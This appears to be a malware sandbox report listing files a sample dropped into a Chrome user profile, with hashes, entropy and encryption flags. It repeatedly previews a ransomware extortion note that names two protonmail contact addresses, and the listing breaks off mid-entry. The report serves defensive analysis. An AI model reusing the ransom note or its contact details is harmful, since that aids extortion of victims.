                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):46080
                  Entropy (8bit):7.977908644162314
                  Encrypted:false
                  SSDEEP:768:kb0E/3YtJvIPkiHGvM+jKzwGkniRV6xt1GfWhPilRx9qVEqy6mZs+5Q/e+hxmn3J:e0E/3Yt6rHG7KUGOx/Q+lrKTswQ/1EYy
                  MD5:02182EEC766BA320B01F57F003D38E4B
                  SHA1:92BBABD47B188F27B4D44F712E96784B607C3C47
                  SHA-256:4E5AF1B182825A7552E327B2594D86E86F85E849C8C7E99806563F04A6C0E077
                  SHA-512:0756CCECC90FC1FDEF6563407258AB75BFBD3A07AB9FCE5C2273B82A46478CD449881198EE152EA867379A4DBAF51343303571D8AECC379B6CB98209B2AD2C90
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.9980852407939516
                  Encrypted:true
                  SSDEEP:6144:zdrasXXv9AwvbkSg+Jvb24h404XGPkcn/2fZ:B3vaIvbDv4XGhn/2x
                  MD5:FF6B5BACDF0A524AB940136E7D709CAF
                  SHA1:199B3D0058EC2926CC8F2078801B431CD36044CD
                  SHA-256:67C22C26C57AFCFC2E2BD5866CB4F620B1E0CAB3F8B476AFE00749522A1AA3EC
                  SHA-512:15EC2C5981A431721FF39DE919AE7F4D17F0818CA9CBCAAA100591AFE3B63139B2C1DE5360A9EFEA6BA1648CA500950898FE3686405884481C58ECA7881A9B28
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.9997766068805465
                  Encrypted:true
                  SSDEEP:24576:XBw1FgvWzsbXOnmO2+fgUYg2l8RCraqbASiZvHBaA26Kv6HJhYULaJ:RS+vSsYtNgU2eWAHBaA2IwJ
                  MD5:D90C5ACE68AB2B35E83F0262B638EBD9
                  SHA1:82AAD11AFF8CA22B1683DDB75B937E05D8791170
                  SHA-256:43E0BC900AD8CE91188ED715CA3B6CEB212D3D0BE02E539221B4000AA7038FA3
                  SHA-512:BAA719483D8EE20F9CFAC845726407BB6A188021F74138AF5A9E2F8B1CAB90CE041C6B6B65FAFFAE076AB16F13DCC0FBBCA3C8878D6D3E83FF7F7070F4B7EF2E
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4200448
                  Entropy (8bit):7.999949417676622
                  Encrypted:true
                  SSDEEP:98304:gtKl64cMjfzv+yy729gg8mlImWauJwbf2AwchVpuIfoyY6zEhDiB:XlbcMTzTlSm+mWGbf9wchVgxegM
                  MD5:A3726299D1FB3EE6E35BBD80E1D96FEF
                  SHA1:47C836A90D89A7C95409A0C2288CBB114DC6FDDF
                  SHA-256:9768DE1BE9FBFC4B28B60E5510C1C97E170C49814668E69A715584C4BD3A78E5
                  SHA-512:990B3EC1E498A88C85A8489EBFBBCCCF606B30D3853CD36F76BDE387E21F256D67297A4AFB3BA89C354EE8F153AD7DEE3CCE883B17AEB4DE9B27027BDE438B69
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):79872
                  Entropy (8bit):7.9916887676357415
                  Encrypted:true
                  SSDEEP:1536:aRvehGZAZ9i1Ex0b8vYS8dJi0QpjbiUX7HBU/GGTppK8zeldTPEbiAzqh:wWAAQa04vYS8L8jeUX7HBU3pKssEbi+m
                  MD5:3A51097A1D6CCD88B57B3EBE8E36D6FD
                  SHA1:B252B506B56F11CE5AA0DE5AC67FBEBC791F539C
                  SHA-256:48DF4BDDF691F0EBDC603C00B628040829710205ABA61CE7ED11F7AAB354868A
                  SHA-512:991F9631B99E3098418A7AEC13F24773BAA9E3D58C1C56272A1231C11DA9A33C9D8869652F7EAB9AF2A138AC5A62D0C4397B55524F500A17D37792A8D73E1351
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):36864
                  Entropy (8bit):7.968018841192595
                  Encrypted:false
                  SSDEEP:768:YCktg44Q636+KlW73eGEjOPRElupifvRr4NPVAuNYd3We/OYmBUV7/a:YCSgTQ6K+kWbeGOOulupg4HAuNw3Wer+
                  MD5:7A7D58BDAD92991BA5496079D641500E
                  SHA1:66B7A9BC0117782E7C21F749A6838E01608C8795
                  SHA-256:044FBE5581774C40914EF2DD985147FCD4CF10E0179211D05D3479B93A1E43D6
                  SHA-512:B9C59A2FA5ABFBC08E46DE3C3E71AA33C99AB58EF90F794A9767C284E06BA99C767BF15135F1D7F808DEBA2BCDAC75A96F6F14588D276C0BCFADE5796A1BE9C7
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):35840
                  Entropy (8bit):7.966527581036419
                  Encrypted:false
                  SSDEEP:768:7o2ytEuxkrgWKOUUBNbm8MFD0smCxT/JMrtQ9iBU3chq56LWN:M2yeuxk5va/mCVQe9iaX56qN
                  MD5:F9F3BE291DDAA55F08135E3FAA517493
                  SHA1:704564727A43D3499CF229772348ED4060A59A24
                  SHA-256:B1C3A419289348537227E8E11442527CD20C27A685D9B6C6EF73C0E1FB1BC721
                  SHA-512:C29996890FA51B6FCEDCA1AEC933B9734D9627DE473AC3A0F164A4DE913A58435A9BE82502A2750BC374286597C78FD2C539CCF3BC48E82B9E0D4CAA0D1A4E59
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):43008
                  Entropy (8bit):7.974404377352774
                  Encrypted:false
                  SSDEEP:768:EEKyK68x4cZEOIBC7W4Jjfavh4fq0ICHjWVOa9COcmpidKMQB2r5Pa:orJEm7dJremfGOjWYjGidKer5i
                  MD5:F3B817E6B1CF18EFA077408B8FE5FED4
                  SHA1:0CAC4B32AE8CAF2C302E88A5349A2C16F7D984A0
                  SHA-256:9F14659C987DA962913A15542EB802F0C61FDE4E7ABAE6BC9ED7C9C5088B5484
                  SHA-512:37EADF672E41E64A333161EBBF29FB3560EA7AE509C9E9FD4BA1B9859444F1A8D9DC67DC38C864DFBE225BC60D00664096E209F11287E3FC9830F3ED58F7470A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):43008
                  Entropy (8bit):7.973804540141104
                  Encrypted:false
                  SSDEEP:768:ZTvHcfpxyKnrt04U065xYwF4FbcPmR8LJu842hZpkgtAEln/ZEp3u:RHKplnrjz6EFbzRCI84UpkgDlREp3u
                  MD5:E0AD6D20B44AC993B4B4F61F74F4228C
                  SHA1:E38B1A29C30644571BCCC1B655523F60D7B797F3
                  SHA-256:985F9127D5E70F5ACC6E4FE0465808F120CD1F1C4050BACB6DFFD5D1DE02EA8F
                  SHA-512:FB8E47B03A2D7DC858889C1EBED88C11F43D894308F806D7A7039A789E7250B4E6762547B7A77CFDF630209218064F26DB9B2AE3D2EE282AC89DABB899074F64
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):55296
                  Entropy (8bit):7.983090536655238
                  Encrypted:false
                  SSDEEP:1536:7EP59icKBERZ19QiaMxA507t9d5oPPQYsq:SBgiJxA50RGIYsq
                  MD5:B6216C454248A806DCFB539F37AE13EA
                  SHA1:F2AEB073618AC6AF1575D660C5340B3E07B0207D
                  SHA-256:A868208938A3D70E308E8484171D4AF99C29EB1A1339A18873BF6658C29574FE
                  SHA-512:30024A3CDA40EA04A1AA0855B39F373C4CD0ECB2CCED1AE2EAB0A6AC78CFE58A3FB2CB7A1A89572AC984BE678203BA69D04F489342C67229E11277C7ADA89AE4
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):77824
                  Entropy (8bit):7.990952175391112
                  Encrypted:true
                  SSDEEP:1536:OQmFZpjeGUgP/LZ2oGgmYAj9kKTZ8Q7FK1Vc9VWb5XhwDO/otdkg:OPRJRLIoJAje500vc9Vct2C/op
                  MD5:40ADDEE7F36F62F4F6E1C4982C49139C
                  SHA1:EA5F72B500FF09E111CAB63306D4B47BAE35FCC0
                  SHA-256:1D23CA9BE08E512023076CBAB28C56D85339DE62706799D851F344D4E984BA1B
                  SHA-512:8881412A854AB16DF322B4508657D42DBCB59B989070AEB849C2D75A7E602A4960E017221AD7A65C46C02C64EA21CE31047BE989C10525D0549D01C9B295B79F
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62464
                  Entropy (8bit):7.986124782280932
                  Encrypted:false
                  SSDEEP:1536:yPpE93RxtqWDcJKba5gjCRK5/Xt1eoooBqp6ixrNGpuXyxl6:f93btXrygjCRA/TXoHNx5j
                  MD5:87A84B4DDB80AB0890303D7AC649155E
                  SHA1:A8EE49C5FEE1519C3B47A354BE0493037F8B3E4D
                  SHA-256:ED7B2CE7BCE428251606EE4E80B9691F7CC8484842B49CA0176F7AC3A6FB5926
                  SHA-512:07BD9C232969668AE336CDD21C31461D65426C36CE8DCB6B23C916E36AB83F0AA9811CB9A2753B6373D7945B1B5DF3136E7C709E84A2F89C17FEEE515E3EFE15
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.999437246348804
                  Encrypted:true
                  SSDEEP:12288:iJuvWzzJ+DiE+WNb1V5usRl9jJ9kBaGtCDOFJgJSsUNq:qWAkBTHusRvjIWOFCSI
                  MD5:4D9170A58AB00381254FB4483D48036C
                  SHA1:9FCE87D47E1928DF209A6EEF2CF05914EB5D9AB7
                  SHA-256:373DCCA024BF9A0A14A1EC54ABA04F5C9EEA73FFD3157A4E01A5751173C4DA97
                  SHA-512:FF8E07897A372327AAA637E185ED24A3D72025B64A3F11BA472E4BF671B5B318FA3DDAC8EBC9F15FDBFB33BEAECD2CE9254EFDA4ADF245970B17C87BA73B25F9
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994594102904921
                  Encrypted:true
                  SSDEEP:3072:4r3dW6dB2GiomgO6mGp0rA8Ed0KFLq18pz:4zdW6RU73Gar3Ed0KFLqGJ
                  MD5:735E723D5128E8C2A9C7F86A2EEA7F80
                  SHA1:59531598ACB67B01A7A872A4B30BA3B1CAD0DFC5
                  SHA-256:D5C503698CD13C97683022833E660BB9885833F5F4B8940F0C3B705EFCF0EEB0
                  SHA-512:AE0B13D3E89129E0B3EFB3FDD4EDC20978780BAA670991B9B2E3488A9E92D1CC75A9168D6B31AEACC17D25351057FD91FC9693BE261B5C5ABC87B06686D39B87
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921122343075104
                  Encrypted:false
                  SSDEEP:384:Pt7AIxbnAgqnelcuzpsRkSEKX3AubC+THWwGIK0o2lymcYpgd8:LxbnAfM7dPWnw9mK0oR6G+
                  MD5:FB813E639EC911333BA4C948FD3D1B85
                  SHA1:DC7D2954E07AA30C8A9DCFC85D9BF8A0BEF1F412
                  SHA-256:2D1E02A66DD18FDA48407DEBA56829BC8A0717155068D803650CB955BBCA0569
                  SHA-512:6163D102A92522AFD7B959BFD94F4F205B84034D6F3C9B27D18BF25C38F0CD77872C14C8DA3329292C940B22C5ACED14785FA12A1BCF00A6222974166C2FB843
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.59084953819288
                  Encrypted:false
                  SSDEEP:192:toY+LH+nCv3b2Up6JyERjK2Y3Yrxaj2PvVhudNSk:kACzB6RllDadV
                  MD5:3D5AE827B19DDCC597D49C48422C5A09
                  SHA1:99B3CAD24695FCD4F378E7BCA11703BC12682A17
                  SHA-256:5F664FA4CF9A7C4CAC40C5D61E39FDEEE1A93B32721B6BD0FFD669780A5C8D8C
                  SHA-512:E0373572CE6F68916C583F61FB97AA36CEF9CAFD7CA8ACD3DC4600CAB557352873A2D3D48E351448190232A5F77560D4FD8287B160B0315292434F2F29DCAA09
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
